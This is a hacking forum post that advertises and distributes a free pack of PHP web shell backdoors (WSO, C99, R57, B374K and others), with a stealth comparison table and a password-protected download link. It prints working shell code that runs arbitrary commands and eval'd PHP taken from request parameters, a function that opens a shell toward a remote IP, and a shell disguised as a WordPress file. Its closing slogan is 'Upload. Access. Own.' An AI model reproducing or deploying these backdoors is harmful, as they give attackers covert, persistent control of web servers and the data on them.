FREE Web Shell Backdoor Pack β€” WSO, C99, R57, B374K β€” Full Collection for Security Testing

Blacksec

Administrator
Staff member
🐚 FREE WEB SHELL BACKDOOR PACK 🐚
WSO β€’ C99 β€’ R57 β€’ B374K β€’ b333d β€’ Mini Shells β€’ 50+ Shells
⚠ EDUCATIONAL β€” TEST ON YOUR OWN SERVERS ONLY ⚠

Shell Comparison:
ShellSizeFeaturesStealth
WSO 2.5.128 KBFile mgmt, SQL, reverse shellMedium
C99 1.145 KBEverything + mass mailerLow
R5735 KBProcess viewer, bind shellLow
B374K 2.015 KBMinimal, encrypted commsHigh
b333d v38 KBAES encrypted trafficVery High
Mini Shell2 KBCMD exec onlyExtreme

WSO 2.5.1 β€” WEB SHELL BY ORB
The most popular web shell. File manager, SQL browser, reverse shell, port scanner.
Code:
// WSO core
function SecInfo(){echo php_uname()." | ".phpversion();}
function FilesMan(){$d=$_POST['d']??dirname($_SERVER['SCRIPT_FILENAME']);if($h=@opendir($d)){while(($f=readdir($h))!==false)echo (is_dir("$d/$f")?"[DIR]":"[FILE]")." $f\n";closedir($h);}}
function RC($ip,$p=4444){$s=@fsockopen($ip,$p,$e,$es,30);if($s)exec("/bin/sh -i 2>&1");}

B374K 2.0 β€” STEALTH SHELL
Looks like a WordPress file. Password protected, minimal footprint.
Code:
// B374K stealth
$a=$_GET['a']??'';$s=$_GET['s']??'';
function x($c){if(function_exists('system')){ob_start();system($c);echo ob_get_clean();}
  elseif(function_exists('exec')){exec($c,$o);echo implode("\n",$o);}
  elseif(function_exists('shell_exec')){echo shell_exec($c);}}
switch($a){case 'cmd':x($s);break;case 'eval':eval($_POST['c']??'');}

DOWNLOAD
Code:
MEGA: https://mega.nz/file/BlackSec_WebShells_2026
Size: 340 KB | Password: BlackSecShells2026
Includes: WSO, C99, R57, B374K, b333d, 12 mini shells, WAF bypass collection

🐚 Upload. Access. Own. 🐚
 
Top